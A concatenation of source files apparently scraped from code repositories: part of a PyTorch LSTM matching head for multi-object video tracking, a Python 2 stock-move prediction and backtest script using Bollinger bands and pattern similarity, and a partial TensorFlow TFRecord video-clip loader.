# Convert ROI feature map of (7 x 7 x 256) to an vector for matching score computation.
self.query_fcs = nn.ModuleList()
for i in range(num_fcs):
in_channels = (in_channels
if i == 0 else fc_out_channels)
self.in_fcs.append(nn.Linear(in_channels, fc_out_channels))
self.query_fcs.append(nn.Linear(in_channels, fc_out_channels))
self.relu = nn.ReLU(inplace=True)
self.debug_imgs = None
self.dynamic=dynamic
def init_weights(self):
for fc in self.in_fcs:
nn.init.normal_(fc.weight, 0, 0.01)
nn.init.constant_(fc.bias, 0)
for fc in self.query_fcs:
nn.init.normal_(fc.weight, 0, 0.01)
nn.init.constant_(fc.bias, 0)
def compute_comp_scores(self, match_ll, bbox_scores, bbox_ious, label_delta, add_bbox_dummy=False):
# compute comprehensive matching score based on matching likelihood,
# bbox confidence, and ious
if add_bbox_dummy:
bbox_iou_dummy = torch.ones(bbox_ious.size(0), 1,
device=torch.cuda.current_device()) * self.bbox_dummy_iou
bbox_ious = torch.cat((bbox_iou_dummy, bbox_ious), dim=1)
label_dummy = torch.ones(bbox_ious.size(0), 1,
device=torch.cuda.current_device())
label_delta = torch.cat((label_dummy, label_delta),dim=1)
if self.match_coeff is None:
return match_ll
else:
# match coeff needs to be length of 3
assert(len(self.match_coeff) == 3)
return match_ll + self.match_coeff[0] * \
torch.log(bbox_scores) + self.match_coeff[1] * bbox_ious \
+ self.match_coeff[2] * label_delta
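# Worked example for compute_comp_scores above (hypothetical numbers): with
# match_coeff = [1.0, 2.0, 10.0], a proposal whose matching log-likelihood against a
# track is -0.5, with bbox score 0.8, IoU 0.6 and an unchanged predicted label
# (label_delta = 1), scores -0.5 + 1.0*log(0.8) + 2.0*0.6 + 10.0*1, which is about 10.48.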
def forward(self, x, ref_x, x_n, ref_x_n, gt_pids_list):
# x and ref_x are the grouped bbox features of current and reference frame
# x_n are the numbers of proposals in the current images in the mini-batch,
# ref_x_n are the numbers of ground truth bboxes in the reference images.
# here we compute a correlation matrix of x and ref_x
# we also add a all 0 column denote no matching
batch_size = len(x_n)
num_ref = len(ref_x)
# Just rename the given parameters to match with the implicit attribute.
ref_x_list = ref_x
ref_x_n_list = ref_x_n
for ref_x_n in ref_x_n_list:
assert len(x_n) == len(ref_x_n)
# Resize tensors to give it as input to FCs
# (B * #proposals, 256, 7, 7) -> (B * #proposals, 256 * 7 * 7)
x = x.view(x.size(0), -1)
# (seq_len, B * (#objects_1 + #objects_2 + ...), 256, 7, 7)
# -> (seq_len, B * (#objects_1 + #objects_2 + ...), 256 * 7 * 7)
ref_x_list = [ref_x.view(ref_x.size(0), -1) for ref_x in ref_x_list]
# Convert ROI feature to the query vector for matching score computation.
# (B * #proposals, 256 * 7 * 7) -> (B * #proposals, 1024)
for idx, fc in enumerate(self.query_fcs):
x = fc(x)
if idx < len(self.query_fcs) - 1:
x = self.relu(x)
# Convert ROI feature to the input vector for LSTM
# (seq_len, B * (#objects_1 + #objects_2 + ...), 256 * 7 * 7) -> (seq_len, B * (#objects_1 + #objects_2 + ...), 1024)
for idx, fc in enumerate(self.in_fcs):
ref_x_list = list(map(fc, ref_x_list))
if idx < len(self.in_fcs) - 1:
ref_x_list = list(map(self.relu, ref_x_list))
# Split tensors along the batch size (B).
# (B * #proposals, 1024) -> (B, #proposals, 1024)
# x_split:
# Each element consists of (#proposals=x_n[i], 1024) tensor.
x_split = torch.split(x, x_n, dim=0)
# (seq_len, B * (#objects_1 + #objects_2 + ...), 1024) -> (seq_len, B, sum(#objects_i), 1024)
ref_x_split_list = [torch.split(ref_x, ref_x_n, dim=0)
for ref_x, ref_x_n, in zip(ref_x_list, ref_x_n_list)]
# ref_x_dict_list:
# Description:
# List of ref_x_dict for each batch.
# Shape:
# (B, #ref_gt_pid, < seq_len, 1024)
#
# ref_x_dict:
# Description:
# ref_x_dict[gt_pid] is fed as input to the LSTM
# to update hidden state corresponding to the specific 'gt_pid',
# Key:
# ref_gt_pid : int
# Value:
# Sequence of 'ref_x_split's corresponding to the designated 'gt_pid'
# : ( < seq_len, 1024)
ref_x_dict_list = []
for b in range(batch_size):
ref_x_dict = dict()
for i, ref_gt_pids in enumerate(gt_pids_list[:-1]): # Except for gt_pids of 'x' which is the current frame.
for j, ref_gt_pid in enumerate(ref_gt_pids[b]):
if ref_gt_pid == 0:
continue
ref_gt_pid = ref_gt_pid.item()
if ref_gt_pid in ref_x_dict:
ref_x_dict[ref_gt_pid] = torch.cat([ref_x_dict[ref_gt_pid], ref_x_split_list[i][b][j].unsqueeze(0)], dim=0)
else:
ref_x_dict[ref_gt_pid] = ref_x_split_list[i][b][j].unsqueeze(0)
ref_x_dict_list.append(ref_x_dict)
match_score = []
for b in range(batch_size):
# for each ref_gt_pid
h_t_list = []
for ref_gt_pid, ref_x_split in sorted(ref_x_dict_list[b].items()):
ref_x_split = ref_x_split.unsqueeze(1) # (seq_len, 1024) -> (seq_len, 1, 1024)
_, (h_t, c_t) = self.lstm(ref_x_split) # h_t: (num_layer=2, batch=1, hidden_size=1024)
h_t = h_t.squeeze(1)[-1] # (2, 1, 1024) -> (1024, )
h_t_list.append(h_t)
h_t_list = torch.stack(h_t_list, dim=0) # (#objects, 1024)
prod = torch.mm(x_split[b], torch.transpose(h_t_list, 0, 1))
m = prod.size(0)
dummy = torch.zeros(m, 1, device=torch.cuda.current_device())
prod_ext = torch.cat([dummy, prod], dim=1)
match_score.append(prod_ext)
# match_score: (B, #proposals, #ref_gt_pids + 1)
return match_score
def loss(self,
match_score,
ids,
id_weights,
reduce=True):
losses = dict()
if self.dynamic:
n = len(match_score)
x_n = [s.size(0) for s in match_score]
ids = torch.split(ids, x_n, dim=0)
loss_match = torch.tensor([0.], device=torch.cuda.current_device())
match_acc = 0.
n_total = 0
batch_size = len(ids)
for score, cur_ids, cur_weights in zip(match_score, ids, id_weights):
valid_idx = torch.nonzero(cur_weights).squeeze()
if len(valid_idx.size()) == 0: continue
n_valid = valid_idx.size(0)
n_total += n_valid
loss_match += weighted_cross_entropy(
score, cur_ids, cur_weights, reduce=reduce)
match_acc += accuracy(torch.index_select(score, 0, valid_idx),
torch.index_select(cur_ids,0, valid_idx)) * n_valid
losses['loss_match'] = loss_match / n
if n_total > 0:
losses['match_acc'] = match_acc / n_total
else:
losses['match_acc'] = torch.tensor([100.], device=torch.cuda.current_device())
else:
if match_score is not None:
valid_idx = torch.nonzero(id_weights).squeeze()
losses['loss_match'] = weighted_cross_entropy(
match_score, ids, id_weights, reduce=reduce)
losses['match_acc'] = accuracy(torch.index_select(match_score, 0, valid_idx),
torch.index_select(ids, 0, valid_idx))
return losses
def forward_test(self, x, ref_x_hidden_states, x_n, ref_x_n):
'''
Args:
ref_x_hidden_states:
LSTM hidden states for each detected objects
Shape: (# detected objects, 2, 1024)
Example:[(h_1, c_1), (h_2, c_2), ... , ]
'''
assert len(x_n) == len(ref_x_n)
batch_size = len(x_n)
# Resize tensors to give it as input to FCs
# (#proposals, 256, 7, 7) -> (#proposals, 256 * 7 * 7)
x = x.view(x.size(0), -1)
# Convert ROI feature to the query vector for matching score computation.
# (#proposals, 256 * 7 * 7) -> (#proposals, 1024)
for idx, fc in enumerate(self.query_fcs):
x = fc(x)
if idx < len(self.query_fcs) - 1:
x = self.relu(x)
match_score = []
prod = []
# (#objects, h&c=2, num_layers=2, batch=1, hidden_size=1024) -> (#objects, 1024): take h of the last layer
ref_x_hidden_states = ref_x_hidden_states[:, 0, -1, 0, :]
prod = torch.mm(x, torch.transpose(ref_x_hidden_states, 0, 1)) # (#proposals, #objects)
m = prod.size(0) # #proposals
dummy = torch.zeros((m, 1), device=torch.cuda.current_device()) # (#proposals, 1)
prod_ext = torch.cat([dummy, prod], dim=1) # (#proposals, #objects + 1)
match_score.append(prod_ext)
# match_score: (B, #proposals, #objects + 1)
return match_score
def init_hidden_states(self, det_roi_feats):
"""
When it is the first time to feed an input vector to LSTM,
update the hidden states based on the initial value of zeros.
Therefore, only input vecotrs (det_roi_feats) are given here.
"""
# det_roi_feats: (#proposals, 256, 7, 7) -> (#proposals, 1024)
det_roi_feats = det_roi_feats.view(det_roi_feats.size(0), -1) # (#proposals, 256 * 7 * 7))
for idx, fc in enumerate(self.in_fcs):
det_roi_feats = fc(det_roi_feats)
if idx < len(self.in_fcs) - 1:
det_roi_feats = self.relu(det_roi_feats)
det_roi_feats = det_roi_feats.unsqueeze(0) # (#proposals, 1024) -> (1, #proposals, 1024)
_, (h_t, c_t) = self.lstm(det_roi_feats) # h_t: (num_layers, #proposals, hidden_size)
h_t = torch.transpose(h_t, 0, 1).unsqueeze(2) # (num_layers, #proposals, hidden_size) -> (#proposals, num_layers, 1, hidden_size)
c_t = torch.transpose(c_t, 0, 1).unsqueeze(2)
hidden_states = torch.stack([h_t, c_t], dim=1).to(torch.cuda.current_device())
# hidden_states: (#proposals, h&c=2, num_layers=2, batch_size=1, hidden_size)
return hidden_states
def update_hidden_state(self, det_roi_feat, hidden_state):
"""
Update the hidden states based on the given hidden states
when given the input vectors and hidden states.
"""
# det_roi_feat: (256, 7, 7)
# hidden_state: (h&c=2, num_layers=2, batch_size=1, hidden_size=1024)
det_roi_feat = det_roi_feat.view(-1).unsqueeze(0) # (256, 7, 7) -> (1, 256 * 7 * 7)
# det_roi_feat: (1, 256 * 7 * 7) -> (1, 1024)
for idx, fc in enumerate(self.in_fcs):
det_roi_feat = fc(det_roi_feat)
if idx < len(self.in_fcs) - 1:
det_roi_feat = self.relu(det_roi_feat)
det_roi_feat = det_roi_feat.unsqueeze(0) # (batch_size=1, 1024) -> (seq_len=1, batch_size=1, 1024)
_, hidden_state = self.lstm(det_roi_feat, hidden_state)
hidden_state = torch.stack(hidden_state, dim=0)
# hidden_state: (h&c=2, num_layers=2, batch=1, hidden_size=1024)
return hidden_state
``` |
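A sketch of how a caller might turn the test-time match scores into instance ids; the rule that column 0 means a new object comes from the class docstring, while the softmax-plus-argmax decision and the surrounding tracking pipeline are assumptions rather than code from this repository.
```python
# Hypothetical post-processing sketch; forward_test() returns a list with one
# (num_proposals, num_tracked + 1) score tensor per image, where column 0 is the
# all-zero "no match" entry described in the class docstring.
import torch
import torch.nn.functional as F

def assign_ids(match_score, next_new_id):
    probs = F.softmax(match_score, dim=1)
    best = probs.argmax(dim=1)          # 0 -> new object, k > 0 -> tracked object k-1
    ids = []
    for b in best.tolist():
        if b == 0:
            ids.append(next_new_id)     # start a new track
            next_new_id += 1
        else:
            ids.append(b - 1)           # extend existing track b-1
    return ids, next_new_id
```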
{
"source": "jinwb000/nlp",
"score": 2
} |
#### File: jinwb000/nlp/auto_regression_predictor.py
```python
import sys
import datetime
import pytz
import numpy as np
import pandas as pd
import talib as ta
from scipy import stats
def similar(ndarr, hisDf, curDf, cor=0.9, onlyPositiveCorr=True):
tmpDf=hisDf.loc[map(int, ndarr)]
closeCor=stats.pearsonr(tmpDf['Close'].values, curDf['Close'].values)[0]
volCor=stats.pearsonr(tmpDf['Volume'].values, curDf['Volume'].values)[0]
if onlyPositiveCorr:
return 1 if closeCor>cor and volCor>cor else 0
else:
if closeCor>cor and volCor>cor:
return 1
elif closeCor<-cor and volCor<-cor:
return -1
else:
return 0
def predict(inputHisDf, lookAheadDays=3, windowSize=20, minCorr=0.9, onlyPositiveCorr=True):
trendWindow = 5
stdGap = 1.25
hisDf = inputHisDf.set_index('index', drop=False).tail(windowSize+1)
pU, pM, pL = ta.BBANDS(hisDf['OrigClose'].head(windowSize).astype(float).values, timeperiod=trendWindow, nbdevup=stdGap, nbdevdn=stdGap)
volU, volM, volL = ta.BBANDS(hisDf['OrigVolume'].head(windowSize).astype(float).values, timeperiod=trendWindow, nbdevup=stdGap, nbdevdn=stdGap)
preP = hisDf['OrigClose'].iat[-2]
curP = hisDf['OrigClose'].iat[-1]
preV = hisDf['OrigVolume'].iat[-2]
curV = hisDf['OrigVolume'].iat[-1]
pUSlope = _array_slope(pU[-trendWindow:])
pMSlope = _array_slope(pM[-trendWindow:])
volUSlope = _array_slope(volU[-trendWindow:])
volMSlope = _array_slope(volM[-trendWindow:])
if volMSlope > 0: #goes upper with larger std
if curP > pL[-1] and preP < pL[-1]:
return 1
if curP < pU[-1] and preP > pU[-1]:
return -1
'''
if pUSlope > 0 and pMSlope > 0 and pUSlope-pMSlope > 0: #goes upper with larger std
if curP > pU[-1] and preP < pU[-1]:
return 1
elif curP < pU[-1] and preP > pU[-1]:
return -1
elif curP < pL[-1] and preP > pL[-1]:
return -1
elif curP > pL[-1] and preP < pL[-1]:
return 1
elif pUSlope < 0 and pMSlope < 0 and pUSlope-pMSlope < 0: #goes down with small std
if curP > pL[-1] and preP < pL[-1]:
return 1
elif curP < pL[-1] and preP > pL[-1]:
return -1
if volUSlope > 0 and volMSlope > 0 and volUSlope-volMSlope > 0:
if curP > pL[-1] and preP < pL[-1]:
return 1
if curP > pM[-1] and pMSlope > 0:
return 1
if curP < pU[-1] and preP > pU[-1]:
return -1
if curP < pM[-1] and pMSlope < 0:
return -1
elif volUSlope < 0 and volMSlope < 0 and volUSlope-volMSlope < 0:
if curP < pU[-1] and preP > pU[-1]:
return -1
'''
return 0
def _array_slope(series):
if isinstance(series, list) or isinstance(series, np.ndarray):
series = pd.Series(series)
assert isinstance(series, pd.Series)
X = pd.Series(range(len(series)))
return X.corr(series)
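# Example for _array_slope above: _array_slope(pd.Series([1, 2, 3, 4, 5])) == 1.0 for a
# strictly increasing window, -1.0 for a strictly decreasing one, and close to 0 when the
# window is uncorrelated with time.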
def predict_bl(inputHisDf, lookAheadDays=3, windowSize=20, minCorr=0.9, onlyPositiveCorr=True):
hisDf = inputHisDf.set_index('index', drop=False)
std = pd.rolling_std(hisDf, windowSize)
mvg = pd.rolling_mean(hisDf, windowSize)
lastClose = hisDf.iloc[-1]['OrigClose']
lastMvg = mvg.iloc[-1]['OrigClose']
lastStd = std.iloc[-1]['OrigClose']
if lastStd == 0:
return 0
diversion = (lastClose - lastMvg)/lastStd
if diversion > 1.5:
return -1
if diversion < -1.5:
return 1
return 0
def predict_ar(inputHisDf, lookAheadDays=3, windowSize=20, minCorr=0.9, onlyPositiveCorr=True):
hisDf = inputHisDf.set_index('index', drop=False)
ecurDf=hisDf[-windowSize:]
ehisDf=hisDf[:-windowSize]
if pd.__version__ < '0.18':
hisSim=pd.rolling_apply(ehisDf['index'], windowSize, similar, args=(ehisDf,ecurDf,minCorr,onlyPositiveCorr))
else:
hisSim=ehisDf['index'].rolling(center=False,window=windowSize).apply(func=similar, args=(ehisDf,ecurDf,minCorr,onlyPositiveCorr), reduce=False)
hisSim=hisSim[hisSim.index<len(hisDf)-lookAheadDays]
# Close is already smoothed by the moving average, so it may not be suitable to use here
#positiveSim=hisDf.iloc[hisSim[hisSim>0].index+lookAheadDays]['Close'].values/hisDf.iloc[hisSim[hisSim>0].index]['Close']-1
positiveSim=hisDf.iloc[hisSim[hisSim>0].index]['PctChg']
if onlyPositiveCorr:
return positiveSim.median()
else:
#negtiveSim=hisDf.iloc[hisSim[hisSim<0].index+lookAheadDays]['Close'].values/hisDf.iloc[hisSim[hisSim<0].index]['Close']-1
negtiveSim=hisDf.iloc[hisSim[hisSim<0].index]['PctChg']
negtiveSim*=-1
sim = pd.concat([positiveSim, negtiveSim])
return sim.median()
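# Note: predict_ar is an analogue ("similar pattern") forecast: similar() is slid over the
# earlier history, windows whose MA'd Close and Volume both correlate with the current
# window above minCorr are collected (negatively correlated windows count with flipped sign
# when onlyPositiveCorr is False), and the median of the PctChg values stored at those
# matches is returned; a NaN result means no sufficiently similar window was found.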
def test(maDf, testSize=50, lookAheadDays=3, windowSize=20, minCorr=0.9, onlyPositiveCorr=True):
right = 0.0
unpredicable = 0.0
for i in range(-testSize-lookAheadDays,-lookAheadDays,1):
testDf=maDf[:i]
predictedChg = predict(testDf, lookAheadDays, windowSize, minCorr, onlyPositiveCorr)
length = len(maDf)
        # Close is already MA'd, so it may not be suitable to use here
#realChg = maDf.at[length+i+lookAheadDays,'Close']/maDf.at[length+i,'Close'] -1
realChg = maDf.at[length+i+lookAheadDays,'PctChg']
dt = maDf.at[length+i, 'TradeDate']
predictDt = maDf.at[length+i+lookAheadDays, 'TradeDate']
print 'today:%s %s predict:%s %s predict chg:%s real chg:%s' % (dt,maDf.at[length+i,'OrigClose'], predictDt,maDf.at[length+i+lookAheadDays,'OrigClose'], predictedChg, realChg)
if str(predictedChg) == 'nan' or predictedChg is np.nan:
unpredicable += 1
if predictedChg*realChg > 0:
right += 1
return unpredicable, right
def prepare_data(ticker, maMethod='ema', maPeriod=20, lookAheadDays=3, start='', end='', useYahoo=False):
if not end:
now = datetime.datetime.now()
end = now.strftime('%Y%m%d')
if not start:
start = (datetime.datetime.strptime(end, '%Y%m%d')+datetime.timedelta(days=-365*5)).strftime('%Y%m%d')
if useYahoo:
from zipline.utils.factory import load_bars_from_yahoo
tmpStart = datetime.datetime.strptime(start, '%Y%m%d')
ystart = datetime.datetime(tmpStart.year, tmpStart.month, tmpStart.day, 0,0,0,0,pytz.utc)
tmpEnd = datetime.datetime.strptime(end, '%Y%m%d')
yend = datetime.datetime(tmpEnd.year, tmpEnd.month, tmpEnd.day, 0,0,0,0,pytz.utc)
stockDf = load_bars_from_yahoo(stocks=[ticker], start=ystart, end=yend, adjusted=False)[ticker].reset_index()
stockDf['TradeDate'] = stockDf['Date'].apply(lambda x:x.strftime('%Y%m%d'))
stockDf = stockDf[['open', 'high', 'low', 'close', 'volume','TradeDate']]
stockDf.rename(columns={'open':'Open','high':'High','low':'Low','close':'Close','volume':'Volume'}, inplace=True)
else:
sys.path.insert(0, '/home/jinwb/code/IIA/jsforesight/datamodel')
from TickerEodModel import TickerEodModel
eodM=TickerEodModel('testEventDbConfigKey')
stockDf = eodM.get_eod(ticker,start,end)
emaDf=pd.DataFrame(index=stockDf.index)
emaDf['OrigClose']=stockDf['Close']
emaDf['OrigVolume']=stockDf['Volume']
emaDf['TradeDate']=stockDf['TradeDate']
emaDf['PctChg'] = stockDf['Close'].pct_change(periods=lookAheadDays)
emaDf['index']=emaDf.index
if maMethod.lower() == 'ema':
emaDf['Close']=ta.EMA(stockDf['Close'].values, maPeriod)
emaDf['Volume']=ta.EMA(stockDf['Volume'].values, maPeriod)
else:
emaDf['Close']=ta.MA(stockDf['Close'].values, maPeriod)
emaDf['Volume']=ta.MA(stockDf['Volume'].values, maPeriod)
print emaDf.tail(10)
return emaDf
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='predict/test using similarity-prediction')
parser.add_argument('-t', '--ticker', action='store', default='000001.SZ', help='tickers to predict/test')
parser.add_argument('-m', '--mamethod', action='store', choices=['ema','ma'], default='ema', help='ma method to pre-process the Close/Volume')
parser.add_argument('-p', '--maperiod', action='store', type=int, default=20, help='period to ma Close/Volume')
parser.add_argument('-w', '--window', action='store', type=int, default=20, help='window size to match')
parser.add_argument('-a', '--lookahead', action='store', type=int, default=3, help='days to lookahead when predict')
    parser.add_argument('-c', '--mincorr', action='store', type=float, default=0.9, help='minimum correlation for a historical window to count as similar')
parser.add_argument('-s', '--testsize', action='store', type=int, default=50, help='period to test')
parser.add_argument('-b', '--begin', action='store', type=str, default='19900101', help='start of the market data')
parser.add_argument('-e', '--end', action='store', type=str, default='29900101', help='end of the market data')
parser.add_argument('-o', '--onlypositivecorr', action='store_true', default=False)
parser.add_argument('-u', '--usamarket', action='store_true', default=False)
args = parser.parse_args()
df = prepare_data(args.ticker, args.mamethod, args.maperiod, lookAheadDays=args.lookahead, start=args.begin, end=args.end, useYahoo=args.usamarket)
if args.testsize<=0:
pred = predict(df, args.lookahead, args.window, args.mincorr, args.onlypositivecorr)
print 'today:%s predict %s days later chg:%s' % (df.at[len(df)-1, 'TradeDate'], args.lookahead, pred)
else:
unpredicted, right = test(df, args.testsize, args.lookahead, args.window, args.mincorr, args.onlypositivecorr)
print 'ticker:%s, ma period:%s, window:%s, lookahead:%s ma method:%s, testSize: %s predicts:%s, Right Rate: %s, Total Rate:%s' % (args.ticker, args.maperiod, args.window, args.lookahead, args.mamethod, args.testsize,args.testsize-unpredicted, right/(args.testsize-unpredicted), right/args.testsize)
``` |
{
"source": "jinwchoi/M-PACT",
"score": 3
} |
#### File: M-PACT/utils/load_dataset_tfrecords.py
```python
import os
import numpy as np
import tensorflow as tf
from tensorflow.python.training import queue_runner
def load_dataset(model, num_gpus, batch_size, output_dims, input_dims, seq_length, size, base_data_path, dataset, istraining, clip_length, video_offset, clip_offset, num_clips, clip_stride, video_step, preproc_debugging=0, shuffle_seed=0, verbose=True):
"""
    Function to load the dataset, set up the queue and read data into the queue
Args:
:model: tf-activity-recognition framework model object
:num_gpus: Number of gpus to use when training
:batch_size: Number of clips to load into the model each step.
:input_dims: Number of frames used in input
:output_dims: Integer number of classes in current dataset
:seq_length: Length of output sequence expected from LSTM
:size: List detailing height and width of frame
:dataset: Name of dataset being processed
:base_data_path: Full path to root directory containing datasets
:istraining: Boolean variable indicating training/testing phase
        :clip_length:  Length of clips to cut video into, -1 indicates using the entire video as one clip
:clip_offset: "none" or "random" indicating where to begin selecting video clips
:num_clips: Number of clips to break video into
:clip_stride: Number of frames that overlap between clips, 0 indicates no overlap and negative values indicate a gap of frames between clips
Return:
Input data tensor, label tensor and name of loaded data (video/image)
"""
# Get a list of tfrecords file names from which to pull videos
filenames = []
number_of_tfrecords = 0
for f in os.listdir(base_data_path):
filenames.append(os.path.join(base_data_path,f))
number_of_tfrecords += 1
# END FOR
if verbose:
print "Number of records available: ", number_of_tfrecords
# END IF
# Create Queue which will read in videos num_gpus at a time (Queue seeded for repeatability of experiments)
tfrecord_file_queue = tf.train.string_input_producer(filenames, shuffle=istraining, name='file_q', seed=shuffle_seed)
# Errors occurring in a model's preprocessing function are not properly traced back when using 'clip_q'.
# If an error occurs stating that "fifo_queue has insufficient elements", then set '--preprocDebugging 1'
# For debugging, a batch_size other than 1 will cause instability
if preproc_debugging:
input_data_tensor, labels_tensor, names_tensor, video_step_tensor, alpha_tensor = _load_video(model, output_dims, input_dims, seq_length, size, base_data_path, dataset, istraining, clip_length, video_offset, clip_offset, num_clips, clip_stride, tfrecord_file_queue, video_step)
else:
tf.set_random_seed(0) # To ensure the numbers are generated for temporal offset consistently
# Number of threads to be used
thread_count = 1
# Initialize queue that will contain multiple clips of the format [[clip_frame_count, height, width, channels], [labels_copied_seqLength], [name_of_video]]
clip_q = tf.FIFOQueue(num_gpus*batch_size*thread_count, dtypes=[tf.float32, tf.int32, tf.string, tf.float32, tf.float32], shapes=[[input_dims, size[0], size[1], 3],[seq_length],[],[],[]])
# Attempts to load num_gpus*batch_size number of clips into queue, if there exist too many clips in a video then this function blocks until the clips are dequeued
enqueue_op = clip_q.enqueue_many(_load_video(model, output_dims, input_dims, seq_length, size, base_data_path, dataset, istraining, clip_length, video_offset, clip_offset, num_clips, clip_stride, tfrecord_file_queue, video_step))
# Initialize the queuerunner and add it to the collection, this becomes initialized in train_test_TFRecords_multigpu_model.py after the Session is begun
qr = tf.train.QueueRunner(clip_q, [enqueue_op]*num_gpus*thread_count)
queue_runner.add_queue_runner(qr)
# Dequeue the required number of clips so that each gpu contains batch_size clips
input_data_tensor, labels_tensor, names_tensor, video_step_tensor, alpha_tensor = clip_q.dequeue_many(num_gpus*batch_size)
# END IF
# Track scalar value defined in a models preprocessing function in a class variable called 'store_alpha'
if hasattr(model, 'store_alpha'):
model.store_alpha = alpha_tensor
model.add_track_variables('Parameterization_Variables', model.store_alpha)
# END IF
return input_data_tensor, labels_tensor, names_tensor
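# Note: the tensors returned above are fed by TF1-style queue runners, so a caller has to
# start those runners before pulling batches. A minimal, hedged sketch of the usual
# consumption pattern (the session/coordinator wiring here is generic, not code from this
# repository):
#
#   with tf.Session() as sess:
#       sess.run(tf.global_variables_initializer())
#       coord   = tf.train.Coordinator()
#       threads = tf.train.start_queue_runners(sess=sess, coord=coord)
#       data, labels, names = sess.run([input_data_tensor, labels_tensor, names_tensor])
#       coord.request_stop()
#       coord.join(threads)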
def _load_video(model, output_dims, input_dims, seq_length, size, base_data_path, dataset, istraining, clip_length, video_offset, clip_offset, num_clips, clip_stride, tfrecord_file_queue, video_step):
"""
    Function to load a single video and preprocess its frames
Args:
:model: tf-activity-recognition framework model object
:input_dims: Number of frames used in input
:output_dims: Integer number of classes in current dataset
:seq_length: Length of output sequence expected from LSTM
:size: List detailing height and width of frame
:dataset: Name of dataset being processed
:base_data_path: Full path to root directory containing datasets
:istraining: Boolean variable indicating training/testing phase
        :clip_length:  Length of clips to cut video into, -1 indicates using the entire video as one clip
:clip_offset: "none" or "random" indicating where to begin selecting video clips
:num_clips: Number of clips to break video into
:clip_stride: Number of frames that overlap between clips, 0 indicates no overlap and -1 indicates clips are randomly selected and not sequential
:tfrecord_file_queue: A queue containing remaining videos to be loaded for the current epoch
Return:
Input data tensor, label tensor and name of loaded data (video/image)
"""
# Dequeue video data from queue and convert it from TFRecord format (int64 or bytes)
features = _read_tfrecords(tfrecord_file_queue)
frames = tf.cast(features['Frames'], tf.int32)
height = tf.cast(features['Height'], tf.int32)
width = tf.cast(features['Width'], tf.int32)
channel = tf.cast(features['Channels'], tf.int32)
label = tf.cast(features['Label'], tf.int32)
name = features['Name']
# Shape [frames, height, width, channels]
input_data_tensor = tf.reshape(tf.decode_raw(features['Data'], tf.uint8), tf.stack([frames,height,width,channel]))
# BGR to RGB
input_data_tensor = input_data_tensor[...,::-1]
# Reduction in fps to 25 for HMDB51 dataset
if ('HMDB51' in dataset) or ('MIT' in dataset):
input_data_tensor, frames, indices = _reduce_fps(input_data_tensor, frames)
# END IF
# If clip_length == -1 then the entire video is to be used as a single clip
if clip_length <= 0:
clips = [input_data_tensor]
clips = tf.to_int32(clips) # Usually occurs within _extract_clips
else:
clips = _extract_clips(input_data_tensor, frames, num_clips, clip_offset, clip_length, video_offset, clip_stride, height, width, channel)
# END IF
""" Reference of shapes:
clips shape: [num_clips, clip_length or frames, height, width, channels]
model.preprocess_tfrecords input shape: [clip_length or frames, height, width, channels]
"""
# Call preprocessing function related to model chosen that preprocesses each clip as an individual video
if hasattr(model, 'store_alpha'):
clips_tensor = tf.map_fn(lambda clip: model.preprocess_tfrecords(clip[0], tf.shape(clip[0])[0], height, width,channel, input_dims, output_dims, seq_length, size, label, istraining, video_step),
(clips, np.array([clips.get_shape()[0].value]*clips.get_shape()[0].value)), dtype=(tf.float32, tf.float32))
alpha_tensor = clips_tensor[1]
clips_tensor = clips_tensor[0]
else:
clips_tensor = tf.map_fn(lambda clip: model.preprocess_tfrecords(clip, tf.shape(clip)[0], height, width,channel, input_dims, output_dims, seq_length, size, label, istraining, video_step),
clips, dtype=tf.float32)
alpha_tensor = np.array([1.0]*clips.get_shape()[0].value)
# END IF
num_clips = tf.shape(clips_tensor)[0]
video_step = tf.assign_add(video_step, 1)
labels_tensor = tf.tile( [label], [seq_length])
names_tensor = tf.tile( [name], [num_clips])
video_step_tensor = tf.tile([video_step], [num_clips])
""" Reference of shape:
clips_tensor shape: [num_clips, input_dims, size[0], size[1], channels]
"""
return [clips_tensor, tf.tile([labels_tensor], [num_clips,1]), names_tensor, video_step_tensor, alpha_tensor]
def _read_tfrecords(filename_queue):
"""
Function that reads and returns the tfrecords of a selected dataset one at a time
Args:
:filename_queue: A queue of all filenames within a dataset
Return:
Dictionary containing features of a single sample
"""
feature_dict = {}
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
feature_dict['Label'] = tf.FixedLenFeature([], tf.int64)
feature_dict['Data'] = tf.FixedLenFeature([], tf.string)
feature_dict['Frames'] = tf.FixedLenFeature([], tf.int64)
feature_dict['Height'] = tf.FixedLenFeature([], tf.int64)
feature_dict['Width'] = tf.FixedLenFeature([], tf.int64)
feature_dict['Channels'] = tf.FixedLenFeature([], tf.int64)
feature_dict['Name'] = tf.FixedLenFeature([], tf.string)
features = tf.parse_single_example(serialized_example, features=feature_dict)
return features
def _extract_clips(video, frames, num_clips, clip_offset, clip_length, video_offset, clip_stride, height, width, channel):
"""
Function that extracts clips from a video based off of clip specifications
Args:
:video: The video tensor that needs to be split into clips
:frames: The number of frames of the video
:num_clips: Number of clips to break video into
:clip_offset: "none" or "random" indicating where to begin selecting video clips
        :clip_length:  Length of clips to cut video into, -1 indicates using the entire video as one clip
:clip_stride: Number of frames that overlap between clips, 0 indicates no overlap and negative values indicate a gap of frames between clips
Return:
A tensor containing the clip(s) extracted from the video (shape [clip_number, clip_frames, height, width, channel])
"""
if video_offset == 'random':
video_start = tf.random_uniform([], maxval=frames-1, dtype=tf.int32)
else:
video_start = 0
if clip_offset == 'random':
video = tf.cond(tf.greater(clip_length, frames),
lambda: _loop_video_with_offset(video, video, 0, frames, height, width, channel, clip_length),
lambda: video)
clip_begin = tf.random_uniform([num_clips], minval=0, maxval=tf.shape(video)[0]-clip_length+1, dtype=tf.int32)
rs = tf.reshape(clip_begin, [num_clips,1,1,1])
video = tf.to_int32(video)
clips = tf.map_fn(lambda clip_start: video[clip_start[0][0][0]:clip_start[0][0][0]+clip_length], rs)
else:
if num_clips > 0:
frames_needed = clip_length + (clip_length-clip_stride) * (num_clips-1)
video = tf.cond(tf.greater(frames_needed, frames-video_start),
lambda: _loop_video_with_offset(video[video_start:,:,:,:], video, frames-video_start, frames, height, width, channel, frames_needed),
lambda: video[video_start:,:,:,:])
clip_begin = tf.range(0, frames_needed, delta = clip_length-clip_stride)[:num_clips]
rs = tf.reshape(clip_begin, [num_clips,1,1,1])
video = tf.to_int32(video)
clips = tf.map_fn(lambda clip_start: video[clip_start[0][0][0]:clip_start[0][0][0]+clip_length], rs)
else:
            # Get total number of clips possible given clip_length, stride and offset
            # Need at least one clip: loop the video until it has at least clip_length frames
video = tf.cond(tf.greater(clip_length, frames-video_start),
